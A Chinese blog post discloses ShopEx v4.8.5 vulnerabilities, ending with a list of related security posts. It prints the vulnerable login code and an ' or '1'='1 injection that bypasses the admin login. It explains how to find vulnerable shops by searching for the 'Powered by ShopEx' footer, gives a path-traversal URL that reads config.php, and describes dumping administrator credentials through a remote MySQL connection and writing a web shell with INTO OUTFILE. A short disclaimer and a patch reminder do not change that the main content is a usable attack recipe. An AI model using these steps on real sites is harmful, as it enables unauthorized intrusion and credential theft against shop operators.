shopex4.8.5 php5.6,shopex v4.8.5 漏洞
shopex v4.8.5 漏洞
本人声明:
只做技术研究,请勿破坏….谢谢.
漏洞原因:
直接看代码:
public function tryLogin( $aValue, $issuper = false )
{
if ( $aValue['passwd'] == “+_-_-_+” )
{
$aValue['passwd'] = “”;
}
$sql = “SELECT * FROM sdb_operators WHERE username = ‘{$aValue['usrname']}’ AND userpass = ‘”.md5( $aValue['passwd'] ).”‘ AND disabled=’false’”;
if ( $issuper )
{
$sql .= ” AND super=’1′”;
}
return $this->db->selectrow( $sql );
}
这里$aValue['usrname']没有任何过滤直接查询(没想到shopex还爆这种低级漏洞)。
利用方法:
在baidu,google直接搜索 Powered by ShopEx v4.8.5
ps:这就是版权信息带来的困惑。一出漏洞。别人就可以用版权信息找到你。
想去除shopex版权信息的去看 http://www.lp1987.cn/62.html
直接在后台登陆 用户名的地方输入
‘ or ‘1′=’1′ or ‘1′=’1
密码随便输,验证码输正确,直接进入后台。
SQL查询语句就变成这个样子了直接通过
SELECT * FROM sdb_operators WHERE username = ” or ‘1′=’1′ or ‘1′=’1′ AND userpass = ‘x’ AND disabled=’false’
看到此文章的shopex用户赶紧打官方的最新补丁….
另外一个漏洞:
_____________________________________
Shopex V4.8.4 V4.8.5 0Day 通杀
利用前提是程序所应用的数据库服务器,可以外连.这个很关键.
自己搞站时候.遇见的站,网上找不到该版本的漏洞,自己拿回源码读了一下.
找到一个漏洞.还是发出来吧.
http://www.target.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php
mysql -h1.1..1.1 -uuser -ppass
use yourbasename;
select * from sdb_operators;
得到管理员用户密码./shopadmin/ 登陆
后台拿shell,没有仔细研究.
我测试的站,直接用into outfile 一个shell.
网上有个帖子,说可以爆物理路径.测试不可用.
如果install目录没删.下面这个可以看phpinfo
http://www.target.com/install/svinfo.php?phpinfo=true
另外/home/cache/目录的文件,也是可以爆出来的.
目前shopex 官方站,仍然存在该漏洞
shopex4.8.5 php5.6,shopex v4.8.5 漏洞相关推荐
- shopex PHP Notice,ShopEx PHP远程包含漏洞
鬼仔注:未测试. 文章作者:寂寞hacker 信息来源:http://hi.baidu.com/isbx/ 影响版本:4.7及以下 verifycode.php /** * * 登陆验证码生成文件 * ...
- FAMP5.1.0一键安装包,nginx和apache自由切换,拥有WEB控制面板
需要注意的是,在第九主机VPS安装,apache占用内存很高,切换到nginx比较占用小,推荐切换nginx) 最后更新时间:20090605 15:00 0605:解决了404默认页导致日志文件过大 ...
- 忍者X3插件App计划,缔造属于自己的Web营销App
忍者X3的APP开发平台说明 忍者工作室以WEB营销领导者的身份第一时间发布忍者X3营销平台,忍者营销平台无疑将成为了SEO人士必备的工具,我们最专业. 忍者x3是一款基于插件(dll)的一款开发平台 ...
- php ecos,php
php 2011年底爆发出来的hash dos漏洞威力十足, php-5.2.x和php-5.3.x 存在hash dos漏洞 所以这里面需要把 php-5.3.6 换成最新版, 详细查看这里 加强系 ...
- 渗透测试 ( 4 ) --- Meterpreter 命令详解
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>& ...
- 无胁科技-TVD每日漏洞情报-2022-10-14
漏洞名称:Tenda AC15 缓冲区错误漏洞 漏洞级别:严重 漏洞编号:CVE-2022-40860;CNNVD-202209-2394 相关涉及:Tenda AC15路由器v15.03.05.19 ...
- buuctf-ZJCTF,不过如此
这是文件包含 ?text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=&file=php://filter/read=convert.base64 ...
- 【Web安全】木马与后门
一.认识木马与后门 后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法.在软件的开发阶段,程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷.但是,如果这些后门被其他人知道 ...
- shopex php5.3 无法安装,php版本导致shopex4.8.5安装的问题_PHP教程
相信很多人都遇到了和我一样的问题:php5.3以上的版本不再支持Zend Optimizer,但是shopex之类的网站必须要高版本的Zend才能用. 经过了n个小时悲催的摸索,终于搞定了,但是最终也 ...
- shopex.4.85支持php5.3
ShopEx 从PHP5.2到PHP5.3移植 移植中出现的问题: 1.短标签问题 shopex中的一些源文件中使用了短标签,<? ...?>.而在PHP5.3中短标签默认是关闭的.所以, ...
最新文章
- vue路由切换组件没有加载_vue-router 路由跳转后没有加载组件
- netstat 命令state值
- STM32的I/O口的八种工作模式
- xlrd、xlwt操作execl表格
- 用Apache构建WEB服务器
- 【测绘程序设计】坐标正算神器V1.0(附C/C#/VB源程序)
- (转)基于MVC4+EasyUI的Web开发框架形成之旅--基类控制器CRUD的操作
- 电商系统商品库的基本功能设计与实现
- 使用双显示器时其中一个屏幕出现重影的问题——缺少吸收磁环
- TableauとSFDCデータ整理
- 马云:我不为996辩护,我向奋斗者致敬
- java emoji表情 乱码_java 微信昵称带有emoji 表情乱码
- 语义分割的评价指标——MIoU
- 基于Stanford Parser 及OpenNLP Shallow Parser构建句子语法解析树
- spo2数据集_氧仪主要测量指标分别为脉率、血氧饱和度、灌注指数(PI)
- web前端程序员求职时该如何写简历
- 桌面的回收站或IE图标不见后的解决办法
- C# 自制OCR获取图片中的电子数字
- 【数据挖掘】聚类 Cluster 矩阵转换 数据矩阵 - 相似度矩阵 ( 二元变量简介 | 二元变量可能性表 | 对称二元变量 | 简单匹配系数 | 非对称二元变量 | Jaccard 系数 )
- 基于深度学习特征的植物病虫害检测